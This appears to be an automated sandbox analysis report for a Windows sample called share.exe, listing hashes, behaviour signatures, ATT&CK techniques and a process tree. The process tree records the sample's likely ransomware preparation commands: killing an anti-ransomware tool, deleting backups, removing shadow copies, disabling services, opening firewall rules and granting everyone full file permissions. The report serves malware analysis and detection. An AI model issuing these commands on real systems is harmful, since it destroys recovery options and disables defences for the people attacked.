Analysis

  • max time kernel
    137s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    04-06-2021 16:17

General

  • Target

    share.exe

  • Size

    170KB

  • MD5

    108d4532a263fca754b85d942bd55451

  • SHA1

    202a1bf5238322372d1da89850a61c4c050a9edd

  • SHA256

    b010e408ad75f379646832fa83567596c7918be1a54b80fc2b4207c33e57057d

  • SHA512

    72735b3c1c03f7cf0462e59d231bddc8490f26a47690b5ca408313a633f9570d9aa140194439ec997d2e5638eae350bb1b9095857d9bd467e8488efbdd27638a

Score
8/10

Malware Config

Signatures

  • Modifies Windows Firewall 1 TTPs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\share.exe
    "C:\Users\Admin\AppData\Local\Temp\share.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1720
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uuzg5401\uuzg5401.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BCB.tmp" "c:\Users\Admin\AppData\Local\Temp\uuzg5401\CSC3B3AE650BD234159967F7DA4C12CC3C3.TMP"
        3⤵
          PID:1392
      • C:\Windows\SysWOW64\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /F /IM Raccine.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:996
      • C:\Windows\SysWOW64\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /F /IM RaccineSettings.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1876
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:1620
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled
          2⤵
            PID:292
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
            2⤵
              PID:1760
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
              2⤵
                PID:1388
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                2⤵
                  PID:1988
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
                  2⤵
                    PID:1976
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
                    2⤵
                      PID:772
                    • C:\Windows\SysWOW64\sc.exe
                      "C:\Windows\System32\sc.exe" config SQLWriter start= disabled
                      2⤵
                        PID:932
                      • C:\Windows\SysWOW64\sc.exe
                        "C:\Windows\System32\sc.exe" config SstpSvc start= disabled
                        2⤵
                          PID:1776
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
                          2⤵
                            PID:1772
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
                            2⤵
                              PID:1256
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" config MBAMService start= disabled
                              2⤵
                                PID:1356
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1340
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                2⤵
                                  PID:1080
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin
                                  2⤵
                                    PID:1784
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" config Dnscache start= auto
                                    2⤵
                                      PID:2092
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" config FDResPub start= auto
                                      2⤵
                                        PID:2104
                                      • C:\Windows\SysWOW64\sc.exe
                                        "C:\Windows\System32\sc.exe" config upnphost start= auto
                                        2⤵
                                          PID:2116
                                        • C:\Windows\SysWOW64\sc.exe
                                          "C:\Windows\System32\sc.exe" config fdPHost start= auto
                                          2⤵
                                            PID:2184
                                          • C:\Windows\SysWOW64\sc.exe
                                            "C:\Windows\System32\sc.exe" config SSDPSRV start= auto
                                            2⤵
                                              PID:2176
                                            • C:\Windows\SysWOW64\netsh.exe
                                              "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                              2⤵
                                                PID:2516
                                              • C:\Windows\SysWOW64\netsh.exe
                                                "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                                                2⤵
                                                  PID:2580
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
                                                  2⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2640
                                                • C:\Windows\SysWOW64\mountvol.exe
                                                  "mountvol.exe"
                                                  2⤵
                                                    PID:2672
                                                  • C:\Windows\SysWOW64\mountvol.exe
                                                    "C:\Windows\System32\mountvol.exe" A: \\?\Volume{de9ebae3-989d-11eb-b4e6-806e6f6e6963}\
                                                    2⤵
                                                    • Enumerates connected drives
                                                    PID:2720
                                                  • C:\Windows\SysWOW64\mountvol.exe
                                                    "C:\Windows\System32\mountvol.exe" B: \\?\Volume{de9ebae4-989d-11eb-b4e6-806e6f6e6963}\
                                                    2⤵
                                                    • Enumerates connected drives
                                                    PID:2768
                                                  • C:\Windows\SysWOW64\mountvol.exe
                                                    "C:\Windows\System32\mountvol.exe" E: \\?\Volume{de9ebae7-989d-11eb-b4e6-806e6f6e6963}\
                                                    2⤵
                                                    • Enumerates connected drives
                                                    PID:2784
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    "C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q
                                                    2⤵
                                                    • Modifies file permissions
                                                    PID:2868
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    "C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q
                                                    2⤵
                                                    • Modifies file permissions
                                                    PID:2860
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    "C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q
                                                    2⤵
                                                    • Modifies file permissions
                                                    PID:2884
                                                  • C:\Windows\SysWOW64\arp.exe
                                                    "arp" -a
                                                    2⤵
                                                      PID:2944
                                                    • C:\Windows\SysWOW64\net.exe
                                                      "net.exe" view
                                                      2⤵
                                                      • Discovers systems in the same network
                                                      PID:3028
                                                    • C:\Windows\SysWOW64\net.exe
                                                      "C:\Windows\System32\net.exe" use \\10.7.0.39
                                                      2⤵
                                                        PID:2232
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 1544
                                                        2⤵
                                                        • Program crash
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2384
                                                    • C:\Windows\system32\vssvc.exe
                                                      C:\Windows\system32\vssvc.exe
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1212

                                                    Network

                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                    Persistence

                                                    Modify Existing Service

                                                    1
                                                    T1031

                                                    Defense Evasion

                                                    File Permissions Modification

                                                    1
                                                    T1222

                                                    Modify Registry

                                                    1
                                                    T1112

                                                    Discovery

                                                    Query Registry

                                                    1
                                                    T1012

                                                    Peripheral Device Discovery

                                                    1
                                                    T1120

                                                    System Information Discovery

                                                    2
                                                    T1082

                                                    Remote System Discovery

                                                    1
                                                    T1018

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
                                                      MD5

                                                      df44874327d79bd75e4264cb8dc01811

                                                      SHA1

                                                      1396b06debed65ea93c24998d244edebd3c0209d

                                                      SHA256

                                                      55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

                                                      SHA512

                                                      95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
                                                      MD5

                                                      be4d72095faf84233ac17b94744f7084

                                                      SHA1

                                                      cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

                                                      SHA256

                                                      b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

                                                      SHA512

                                                      43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
                                                      MD5

                                                      a725bb9fafcf91f3c6b7861a2bde6db2

                                                      SHA1

                                                      8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                                                      SHA256

                                                      51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                                                      SHA512

                                                      1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
                                                      MD5

                                                      02ff38ac870de39782aeee04d7b48231

                                                      SHA1

                                                      0390d39fa216c9b0ecdb38238304e518fb2b5095

                                                      SHA256

                                                      fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                                                      SHA512

                                                      24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
                                                      MD5

                                                      b6d38f250ccc9003dd70efd3b778117f

                                                      SHA1

                                                      d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

                                                      SHA256

                                                      4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

                                                      SHA512

                                                      67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
                                                      MD5

                                                      597009ea0430a463753e0f5b1d1a249e

                                                      SHA1

                                                      4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

                                                      SHA256

                                                      3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

                                                      SHA512

                                                      5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
                                                      MD5

                                                      75a8da7754349b38d64c87c938545b1b

                                                      SHA1

                                                      5c28c257d51f1c1587e29164cc03ea880c21b417

                                                      SHA256

                                                      bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

                                                      SHA512

                                                      798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
                                                      MD5

                                                      5e3c7184a75d42dda1a83606a45001d8

                                                      SHA1

                                                      94ca15637721d88f30eb4b6220b805c5be0360ed

                                                      SHA256

                                                      8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

                                                      SHA512

                                                      fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                      MD5

                                                      2953bdb4c138ebf5fa9ae5290c510a70

                                                      SHA1

                                                      16f161013ba8d150ebcbc226824de18e09f7f0b4

                                                      SHA256

                                                      5feafaa5bd254ffcedad0afcdec617ccae5f200a8b6689320d6be55dd0643576

                                                      SHA512

                                                      f75e543fe0d8b689b8bfbce92d893d7743a926a67e2907619686c918cb0b03d0af2b222e40b6547d752c5e37a39b22eb498acc9dcbf7a0d631cffb3a62e4e80a

                                                    • C:\Users\Admin\AppData\Local\Temp\RES8BCB.tmp
                                                      MD5

                                                      fc21210adf531a1f5d1ddcb9a51057da

                                                      SHA1

                                                      a56a6f252c1e4e5834747188d3fde96b756f1ea8

                                                      SHA256

                                                      cb9f03590944479be9ef2f0beec3b996b9124362e83ecaf22eaf3d85384f15fe

                                                      SHA512

                                                      1d651f5dd832e169a3b0b4e1c1b03b6c8503907430d18417063ca77c1ce36a9e1db9068bb3c106175e0f7bd95d0f5b2c41c88058754ab559bb00abdae1fb1ee1

                                                    • C:\Users\Admin\AppData\Local\Temp\uuzg5401\uuzg5401.dll
                                                      MD5

                                                      61a7c66ff8bf607f9671f290fb828305

                                                      SHA1

                                                      f9c397d7a3c2223982274aa1dbc4784d23000dec

                                                      SHA256

                                                      22016585e6e0ab90a3a4cd6d7725dc3850023a965ef02a790414de6cbfcaf81f

                                                      SHA512

                                                      5b524e1eb04b7560c1f56411bac59d348cfab697fc6e3acef1956e48c9c170411452695356e56fd216e5b0f3583729294af9ee39330d31100f4c33e711e7addb

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                      MD5

                                                      0953e31c20905d2c4173f566825c4dc9

                                                      SHA1

                                                      6d4a8b6574164fb1e2ae0d838e0fad1c7e04c4cc

                                                      SHA256

                                                      d606b389e1d65796e74facfcf488253578447db82741c92bfefed9bbf9826324

                                                      SHA512

                                                      6b2d91f55bf8f573507d35f672dccc96d12f761116e63fb2d18cec86a901d3de94c3120b5535e278423e8db84c11c29717760a9c916fc23a594610befc3ad284

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\uuzg5401\CSC3B3AE650BD234159967F7DA4C12CC3C3.TMP
                                                      MD5

                                                      479ea030509c2f16b6bc6f6b708c1c2d

                                                      SHA1

                                                      fd53a0e97a5dd542cd64a2cf9752c7c99e36e013

                                                      SHA256

                                                      3509c2be9bab62852403cf6f82dcc40ae24fe42af71b7652c462d10081c1b6aa

                                                      SHA512

                                                      9c7f0518e3a79d7d5d8daf94f67572279762e30c7225b4344fd07b9951643180fecb981ce731b41641e358bc588f38373b6c321e1c34e2e2c1d433eec038df11

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\uuzg5401\uuzg5401.0.cs
                                                      MD5

                                                      6c07e96280d95b04b32b1a9c202569d7

                                                      SHA1

                                                      f839b0e0a90996fa7322780b456530d60be4b400

                                                      SHA256

                                                      156f662be30b207066b8795bc36a09ef76f06af9f9d452953b048a13777b49d3

                                                      SHA512

                                                      b75bbdc2b46c54c3e17892fde04f0b0721ac3e3bc0751f175f47a20da944e47a5510609be821fd82805d2d0134231f953d2b04e2e85338a8e61a3c54eaa04389

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\uuzg5401\uuzg5401.cmdline
                                                      MD5

                                                      079be74f4e0990743c47325d3b00f506

                                                      SHA1

                                                      c381532481d99dcf7b346e34fb155aabc147b354

                                                      SHA256

                                                      b21d05c14346e5bf84d26398b646209ce52e93202794e3a6ac8f8a5e41d9a13a

                                                      SHA512

                                                      6b42aab95c44ac0afa03483044d8d4c42795bcace7e31d6971077e79c2b482b09365df021fb68a24bef034352e9aa2fa04b66bb4cfac919484cb9850f8c78404

                                                    • memory/292-84-0x0000000000000000-mapping.dmp
                                                    • memory/772-89-0x0000000000000000-mapping.dmp
                                                    • memory/932-90-0x0000000000000000-mapping.dmp
                                                    • memory/996-81-0x0000000000000000-mapping.dmp
                                                    • memory/1080-111-0x0000000000000000-mapping.dmp
                                                    • memory/1256-93-0x0000000000000000-mapping.dmp
                                                    • memory/1268-62-0x0000000000000000-mapping.dmp
                                                    • memory/1340-126-0x00000000060D0000-0x00000000060D1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-95-0x0000000000000000-mapping.dmp
                                                    • memory/1340-140-0x0000000006210000-0x0000000006211000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-134-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-133-0x00000000061B0000-0x00000000061B1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-99-0x00000000011C0000-0x00000000011C1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-101-0x0000000001130000-0x0000000001131000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-125-0x0000000005670000-0x0000000005671000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-120-0x0000000005560000-0x0000000005561000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-141-0x00000000011C7000-0x00000000011D8000-memory.dmp
                                                      Filesize

                                                      68KB

                                                    • memory/1340-102-0x0000000005280000-0x0000000005281000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-100-0x00000000011C2000-0x00000000011C3000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-98-0x00000000049D0000-0x00000000049D1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-97-0x0000000000D70000-0x0000000000D71000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1340-96-0x00000000754F1000-0x00000000754F3000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1356-94-0x0000000000000000-mapping.dmp
                                                    • memory/1388-86-0x0000000000000000-mapping.dmp
                                                    • memory/1392-65-0x0000000000000000-mapping.dmp
                                                    • memory/1620-83-0x0000000000000000-mapping.dmp
                                                    • memory/1720-103-0x000000000539F000-0x00000000053A0000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-195-0x00000000053AF000-0x00000000053B1000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-79-0x000000000539D000-0x000000000539E000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-104-0x00000000053A0000-0x00000000053A1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-105-0x00000000053A1000-0x00000000053A2000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-107-0x00000000053A3000-0x00000000053A4000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-106-0x00000000053A2000-0x00000000053A3000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-108-0x00000000053A4000-0x00000000053A5000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-110-0x00000000053A6000-0x00000000053A8000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-109-0x00000000053A5000-0x00000000053A6000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-74-0x0000000005398000-0x0000000005399000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-73-0x0000000005397000-0x0000000005398000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-212-0x00000000053B7000-0x00000000053B9000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-210-0x0000000005398000-0x0000000005399000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-211-0x00000000053BE000-0x00000000053BF000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-208-0x00000000053A9000-0x00000000053B2000-memory.dmp
                                                      Filesize

                                                      36KB

                                                    • memory/1720-207-0x00000000053A2000-0x00000000053A8000-memory.dmp
                                                      Filesize

                                                      24KB

                                                    • memory/1720-76-0x000000000539A000-0x000000000539B000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-59-0x0000000001120000-0x0000000001121000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-72-0x0000000005396000-0x0000000005397000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-205-0x000000000539B000-0x000000000539D000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-163-0x00000000053A8000-0x00000000053A9000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-77-0x000000000539B000-0x000000000539C000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-164-0x00000000053A9000-0x00000000053AB000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-206-0x00000000053BA000-0x00000000053BD000-memory.dmp
                                                      Filesize

                                                      12KB

                                                    • memory/1720-203-0x00000000053BB000-0x00000000053C0000-memory.dmp
                                                      Filesize

                                                      20KB

                                                    • memory/1720-204-0x00000000068C0000-0x00000000068C2000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-201-0x00000000053B9000-0x00000000053BA000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-75-0x0000000005399000-0x000000000539A000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-202-0x00000000053BA000-0x00000000053BB000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-199-0x00000000053B7000-0x00000000053B9000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-198-0x00000000053B5000-0x00000000053B7000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-197-0x00000000053B3000-0x00000000053B5000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-196-0x00000000053B1000-0x00000000053B3000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-71-0x0000000005385000-0x0000000005396000-memory.dmp
                                                      Filesize

                                                      68KB

                                                    • memory/1720-193-0x00000000053AB000-0x00000000053AD000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-194-0x00000000053AD000-0x00000000053AF000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1720-61-0x0000000005380000-0x0000000005381000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-78-0x000000000539C000-0x000000000539D000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-80-0x000000000539E000-0x000000000539F000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-69-0x0000000000420000-0x0000000000421000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1720-70-0x0000000000750000-0x000000000076C000-memory.dmp
                                                      Filesize

                                                      112KB

                                                    • memory/1760-87-0x0000000000000000-mapping.dmp
                                                    • memory/1772-91-0x0000000000000000-mapping.dmp
                                                    • memory/1776-92-0x0000000000000000-mapping.dmp
                                                    • memory/1784-112-0x0000000000000000-mapping.dmp
                                                    • memory/1876-82-0x0000000000000000-mapping.dmp
                                                    • memory/1976-88-0x0000000000000000-mapping.dmp
                                                    • memory/1988-85-0x0000000000000000-mapping.dmp
                                                    • memory/2092-113-0x0000000000000000-mapping.dmp
                                                    • memory/2104-114-0x0000000000000000-mapping.dmp
                                                    • memory/2116-115-0x0000000000000000-mapping.dmp
                                                    • memory/2176-117-0x0000000000000000-mapping.dmp
                                                    • memory/2184-116-0x0000000000000000-mapping.dmp
                                                    • memory/2232-200-0x0000000000000000-mapping.dmp
                                                    • memory/2384-213-0x0000000000360000-0x0000000000361000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2384-209-0x0000000000000000-mapping.dmp
                                                    • memory/2516-142-0x0000000000000000-mapping.dmp
                                                    • memory/2580-144-0x0000000000000000-mapping.dmp
                                                    • memory/2640-178-0x0000000005770000-0x0000000005771000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-191-0x00000000061B0000-0x00000000061B1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-155-0x00000000048C0000-0x00000000048C1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-162-0x0000000004992000-0x0000000004993000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-152-0x00000000049D0000-0x00000000049D1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-160-0x0000000004990000-0x0000000004991000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-161-0x00000000052F0000-0x00000000052F1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-151-0x0000000000D50000-0x0000000000D51000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-146-0x0000000000000000-mapping.dmp
                                                    • memory/2640-175-0x0000000005680000-0x0000000005681000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2640-192-0x00000000061C0000-0x00000000061C1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2672-148-0x0000000000000000-mapping.dmp
                                                    • memory/2720-150-0x0000000000000000-mapping.dmp
                                                    • memory/2768-153-0x0000000000000000-mapping.dmp
                                                    • memory/2784-154-0x0000000000000000-mapping.dmp
                                                    • memory/2860-157-0x0000000000000000-mapping.dmp
                                                    • memory/2868-156-0x0000000000000000-mapping.dmp
                                                    • memory/2884-158-0x0000000000000000-mapping.dmp
                                                    • memory/2944-159-0x0000000000000000-mapping.dmp
                                                    • memory/3028-165-0x0000000000000000-mapping.dmp